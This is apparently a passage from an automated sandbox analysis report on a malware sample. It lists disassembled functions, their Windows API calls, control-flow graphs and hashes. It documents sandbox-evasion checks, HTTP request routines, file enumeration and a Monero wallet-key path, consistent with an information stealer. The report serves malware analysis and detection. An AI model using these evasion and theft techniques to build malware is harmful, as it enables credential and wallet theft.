                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: 69262e7203cfb903c2ec87e958661759a52543cc309e5eff15dd17fe1f6b9415
                                • Instruction ID: 99cbdc46a7953657644bab7c7e8b1cbb7f5dcdff0b453c0481b2641d3aac3b0e
                                • Opcode Fuzzy Hash: 69262e7203cfb903c2ec87e958661759a52543cc309e5eff15dd17fe1f6b9415
                                • Instruction Fuzzy Hash: EA314075D002089ADB09F7E0E856FEE77B8EF44340F04652AF512B2282DF715A43D7A6
                                Function 00EC1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 ec1220-ec1247 call ed89b0 GlobalMemoryStatusEx 1439 ec1249-ec1271 call edda00 * 2 1436->1439 1440 ec1273-ec127a 1436->1440 1442 ec1281-ec1285 1439->1442 1440->1442 1444 ec129a-ec129d 1442->1444 1445 ec1287 1442->1445 1446 ec1289-ec1290 1445->1446 1447 ec1292-ec1294 ExitProcess 1445->1447 1446->1444 1446->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                • __aulldiv.LIBCMT ref: 00EC1258
                                • __aulldiv.LIBCMT ref: 00EC1266
                                • ExitProcess.KERNEL32 ref: 00EC1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction ID: 7a803a1b611b289c94e5370dea8e0f6004e78349a33670d11223df9db4607408
                                • Opcode Fuzzy Hash: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction Fuzzy Hash: 1601A2B0D44308BAEB14EBD0CD49FADB7B8EF00705F208049F705B62C1D7B555428798
                                Function 00ED6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 ed6af3 1451 ed6b0a 1450->1451 1453 ed6b0c-ed6b22 call ed6920 call ed5b10 CloseHandle ExitProcess 1451->1453 1454 ed6aba-ed6ad7 call edaad0 OpenEventA 1451->1454 1460 ed6ad9-ed6af1 call edaad0 CreateEventA 1454->1460 1461 ed6af5-ed6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 6c498f3da2f1c194b19db8a8799f3720a160a1f4dd82df2fffbbf472bd7abbe3
                                • Instruction ID: c3af2cf3e5977176c26fe426d813e8f010f909eca9c40797493384d06b2bc3ce
                                • Opcode Fuzzy Hash: 6c498f3da2f1c194b19db8a8799f3720a160a1f4dd82df2fffbbf472bd7abbe3
                                • Instruction Fuzzy Hash: F8F05E30940319ABEB20ABA0EC06BBD7B74EF04701F10A527F513B22C1DBF05682D756
                                Function 00EC47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: c50eef585ff125dc8e5d32540d1938b696541bc66ed9da60a45c15894b8cea4b
                                • Instruction ID: be5d9375714ddb877910f5914646517304440eaaa5e4d8f6dd1086a6bf3808b8
                                • Opcode Fuzzy Hash: c50eef585ff125dc8e5d32540d1938b696541bc66ed9da60a45c15894b8cea4b
                                • Instruction Fuzzy Hash: 4F215EB1D00209ABDF14DFA4EC45ADE7B74FF04320F109625F925B7281EB706A0ACB81
                                Function 00ED51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction ID: 2cd4ac1931a053862da47214513487fd5b38d990b9214edd8ee62c2bc656c70c
                                • Opcode Fuzzy Hash: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction Fuzzy Hash: 75112131900148ABCB18FF60DD56EED73B8EF50300F44516AF81A66292EF70AB07C691
                                Function 00EC1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                • ExitProcess.KERNEL32 ref: 00EC1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction ID: 97ecfab70612d0551d4a9b12fa60fdbce998406d5db83f3bf98ef69f416d1f29
                                • Opcode Fuzzy Hash: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction Fuzzy Hash: 4BE08670D45308FBE7246BA0AD0AF0876B8AF04B02F104095F709771C1C6F526419798
                                Function 00EC10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EC10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EC10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction ID: ba7f5d838f066ffc66f19302fcd4a02512f7d3b569123accf21d9f852d1125a4
                                • Opcode Fuzzy Hash: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction Fuzzy Hash: 31F0E271A41308BBE7149AA4AD5AFABB7E8E709B15F302458F504E3280D5729F40CBA0
                                Function 00EC1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                • ExitProcess.KERNEL32 ref: 00EC11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction ID: a51dbd862047ad33d8b38f73b7a83e2f1fc62558b157d629c3f63c3559d9515c
                                • Opcode Fuzzy Hash: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction Fuzzy Hash: F2E0ECA5D1431152CA1873B4BD0AB2A32DC9B15349F08242ABA05A3247FA6AE8428665

                                Non-executed Functions

                                Function 00ED38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ED38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED38E3
                                • lstrcat.KERNEL32(?,?), ref: 00ED3935
                                • StrCmpCA.SHLWAPI(?,00EE0F70), ref: 00ED3947
                                • StrCmpCA.SHLWAPI(?,00EE0F74), ref: 00ED395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED3C67
                                • FindClose.KERNEL32(000000FF), ref: 00ED3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction ID: fb0125aa11bdbb7c468afaa646c2742b151785b7766c718a5c85c43658a17bf3
                                • Opcode Fuzzy Hash: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction Fuzzy Hash: 1EA151B2A003089BDB35DB64DC85FEA73B8FF88300F044599A51DA7145EBB19B85CF62
                                Function 00ECBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00EE0B32,00EE0B2B,00000000,?,?,?,00EE13F4,00EE0B2A), ref: 00ECBEF5
                                • StrCmpCA.SHLWAPI(?,00EE13F8), ref: 00ECBF4D
                                • StrCmpCA.SHLWAPI(?,00EE13FC), ref: 00ECBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECC7BF
                                • FindClose.KERNEL32(000000FF), ref: 00ECC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
